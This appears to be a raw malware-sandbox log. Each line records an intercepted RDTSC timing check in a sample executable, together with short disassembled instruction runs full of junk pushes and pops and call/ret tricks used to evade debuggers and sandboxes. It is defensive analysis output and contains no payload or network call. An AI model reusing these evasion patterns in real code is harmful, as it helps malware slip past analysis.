Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48C343 second address: 48C347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48C347 second address: 48C34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48C34B second address: 48C3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FD180B5C158h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jmp 00007FD180B5C165h 0x00000029 push 00000000h 0x0000002b cld 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FD180B5C158h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 movzx ebx, si 0x0000004b push eax 0x0000004c push ecx 0x0000004d je 00007FD180B5C15Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48D355 second address: 48D359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48A7C3 second address: 48A7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48E50A second address: 48E517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48E517 second address: 48E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 48F287 second address: 48F2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 sub edi, dword ptr [ebp+122D3A88h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FD1807ED548h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push edi 0x0000002c xor dword ptr [ebp+122D2FC4h], ebx 0x00000032 pop ebx 0x00000033 push 00000000h 0x00000035 mov edi, 4BEB6400h 0x0000003a xchg eax, esi 0x0000003b jns 00007FD1807ED54Eh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jnl 00007FD1807ED548h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 491278 second address: 49127C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 49127C second address: 49128A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4301BD second address: 4301C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A0FB1 second address: 4A0FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A30BA second address: 4A30C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A30C0 second address: 4A30C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A32ED second address: 4A32F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A8328 second address: 4A8341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED555h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A8341 second address: 4A8347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4A8347 second address: 4A834B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4AF444 second address: 4AF489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FD180B5C156h 0x0000000b pop eax 0x0000000c jmp 00007FD180B5C166h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD180B5C165h 0x0000001a pushad 0x0000001b jp 00007FD180B5C156h 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 475EDA second address: 45CEAE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e call dword ptr [ebp+122D2EE9h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FD1807ED553h 0x0000001c jmp 00007FD1807ED54Bh 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 475F68 second address: 475F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47DC5A second address: 47DC5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 476479 second address: 47647F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 476721 second address: 47672A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47672A second address: 47672E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 47672E second address: 476752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnc 00007FD1807ED553h 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 476752 second address: 47676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 jnc 00007FD180B5C156h 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 477065 second address: 477069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 45D9EB second address: 45D9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B2D2B second address: 4B2D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B2D31 second address: 4B2D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B3453 second address: 4B3457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B3614 second address: 4B3618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B960F second address: 4B9615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B9615 second address: 4B9655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FD180B5C15Bh 0x0000000a jmp 00007FD180B5C15Bh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FD180B5C164h 0x00000018 jmp 00007FD180B5C15Eh 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jo 00007FD180B5C156h 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B84B0 second address: 4B84B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D25 second address: 4B8D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D29 second address: 4B8D53 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD1807ED558h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnl 00007FD1807ED546h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D53 second address: 4B8D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D59 second address: 4B8D67 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD1807ED546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D67 second address: 4B8D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D6B second address: 4B8D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FD1807ED552h 0x00000010 jng 00007FD1807ED546h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8D83 second address: 4B8D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD180B5C15Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8EB3 second address: 4B8EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4B8EBA second address: 4B8F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD180B5C15Ah 0x00000008 jmp 00007FD180B5C15Dh 0x0000000d jmp 00007FD180B5C15Eh 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007FD180B5C163h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 42CA59 second address: 42CA6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 42CA6C second address: 42CA74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BEE8D second address: 4BEE9D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD1807ED546h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BEE9D second address: 4BEEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C169h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BF3E9 second address: 4BF3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BF3ED second address: 4BF40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD180B5C160h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BF574 second address: 4BF589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD1807ED550h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BF589 second address: 4BF59D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA48 second address: 4BFA65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007FD1807ED546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD1807ED54Ch 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA65 second address: 4BFA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA6A second address: 4BFA9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD1807ED54Fh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD1807ED559h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA9A second address: 4BFA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BFA9E second address: 4BFAA8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD1807ED546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4BE340 second address: 4BE346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C238F second address: 4C23C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED556h 0x00000008 jmp 00007FD1807ED54Dh 0x0000000d popad 0x0000000e jno 00007FD1807ED548h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C23C7 second address: 4C23CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C23CE second address: 4C23E8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD1807ED54Eh 0x00000008 jbe 00007FD1807ED54Eh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C5391 second address: 4C5397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C92C8 second address: 4C92F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED553h 0x0000000b popad 0x0000000c jl 00007FD1807ED564h 0x00000012 js 00007FD1807ED54Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C92F2 second address: 4C92F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C92F9 second address: 4C9301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8B5C second address: 4C8B89 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FD180B5C156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD180B5C15Eh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FD180B5C158h 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4C8CD0 second address: 4C8CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4CC75A second address: 4CC760 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4CC8EF second address: 4CC8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D2965 second address: 4D2969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 476BD1 second address: 476BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 popad 0x0000000a js 00007FD1807ED54Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D928F second address: 4D92B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD180B5C168h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D93FA second address: 4D9418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED553h 0x00000009 jg 00007FD1807ED546h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9572 second address: 4D9580 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD180B5C156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9580 second address: 4D9584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9584 second address: 4D958A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9BA5 second address: 4D9BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FD1807ED54Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4D9BB8 second address: 4D9BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD180B5C156h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DA9B9 second address: 4DA9BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DACCB second address: 4DACD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FD180B5C156h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DACD7 second address: 4DACE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DAFB5 second address: 4DAFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD180B5C15Fh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DAFCC second address: 4DAFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DFF6F second address: 4DFF75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DEFB5 second address: 4DEFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DEFB9 second address: 4DEFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DEFBF second address: 4DEFDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED551h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	RDTSC instruction interceptor: First address: 4DF190 second address: 4DF194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
